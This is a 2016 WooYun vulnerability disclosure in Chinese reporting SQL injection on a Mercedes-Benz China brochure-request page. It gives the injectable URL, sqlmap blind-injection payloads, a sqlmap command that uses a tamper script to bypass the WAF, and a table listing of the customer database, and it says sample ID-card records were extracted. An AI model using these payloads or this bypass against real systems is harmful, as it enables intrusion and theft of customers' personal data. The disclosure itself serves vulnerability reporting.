当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0198751

漏洞标题:汽车安全之奔驰某站SQL注入/可影响大量客户信息(bypass waf)

相关厂商:mercedes-benz.com.cn

漏洞作者: 路人甲

提交时间:2016-04-21 11:27

修复时间:2016-06-05 12:00

公开时间:2016-06-05 12:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-21: 细节已通知厂商并且等待厂商处理中
2016-04-21: 厂商已经确认,细节仅向厂商公开
2016-05-01: 细节向核心白帽子及相关领域专家公开
2016-05-11: 细节向普通白帽子公开
2016-05-21: 细节向实习白帽子公开
2016-06-05: 细节向公众公开

简要描述:

详细说明:

注入点:https://contact.mercedes-benz.com.cn/brochure/step2/?model=16&language=cn

sqlmap identified the following injection point(s) with a total of 60 HTTP(s) requests:
---
Parameter: model (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: model=16) AND 8776=8776 AND (8606=8606&language=cn
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: model=16) AND (SELECT * FROM (SELECT(SLEEP(5)))Fzth) AND (7771=7771&language=cn
---
web server operating system: Linux
web application technology: Apache
back-end DBMS: MySQL 5.0.12


有过滤。
爆当前数据库的时候需要添加脚本between!!!!
sqlmap.py -u "https://contact.mercedes-benz.com.cn/brochure/step2/?model=16&language=cn" --batch --random-agent --tamper=between --current-db

Database: db_contactnew
+---------------------------+---------+
| Table                     | Entries |
+---------------------------+---------+
| ci_statistical_page       | 20997746 |
| ci_statistical_model      | 1332505 |
| ci_statistical_brochure   | 632541  |
| ci_statistical_pricelist  | 194508  |
| ci_brochure               | 135619  |
| bak_ci_preownd_20160315   | 43942   |
| ci_preownd                | 42708   |
| ci_test_drive_20160415    | 39587   |
| ci_test_drive             | 30309   |
| ci_newsletter             | 4996    |
| ci_email                  | 4609    |
| ci_campaignairchina       | 1906    |
| ci_arena_form             | 643     |
| ci_dealer                 | 505     |
| ci_model_class            | 485     |
| ci_city                   | 461     |
| ci_dealer_bak             | 213     |
| ci_ib_modeldata_feature   | 154     |
| ci_user_weiboapp          | 91      |
| ci_model_preowned         | 74      |
| ci_presale                | 68      |
| ci_model_brochure         | 54      |
| ci_model                  | 48      |
| ci_wallpaper              | 48      |
| ci_z                      | 48      |
| ci_arena_events           | 45      |
| ci_model_pricelist        | 44      |
| ci_model_brand            | 36      |
| ci_province               | 34      |
| ci_ib_modeldata_technical | 27      |
| ci_model_bodytype         | 22      |
| ci_user                   | 4       |
+---------------------------+---------+


数据量不小哦!
来看下一些隐私信息,4万多:

bc1.png


用户身份证信息,只爆3条记录作为证明

bc2.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-04-21 11:50

厂商回复:

于已披露漏洞(WooYun-2016-)情况相同,感谢乌云平台及作者路人甲对我公司的及时预警!

最新状态:

暂无